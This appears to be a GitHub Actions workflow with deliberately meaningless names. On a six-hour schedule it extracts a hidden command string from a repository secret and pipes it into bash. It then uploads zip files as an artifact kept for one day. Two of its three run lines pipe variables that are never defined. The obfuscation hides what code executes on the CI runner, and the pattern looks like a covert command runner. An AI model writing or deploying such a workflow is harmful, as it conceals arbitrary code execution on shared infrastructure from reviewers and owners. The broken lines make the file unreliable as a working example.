name: guokenushi
on:
  workflow_dispatch:

  schedule:
    - cron: '18 3,9,15,21 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: guokenushi
        env:
          uszl67: ${{ secrets.uszl67 }}
        run: |
          printf '%s' "$uszl67" | jq -r .oqxjm2 | /bin/bash
          echo $qmakl965 | jq -r .ky14 | /bin/bash
          echo $a72376 | jq -r .xpogt94 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: iPJi8cGX
          path: "*.zip"
          retention-days: 1
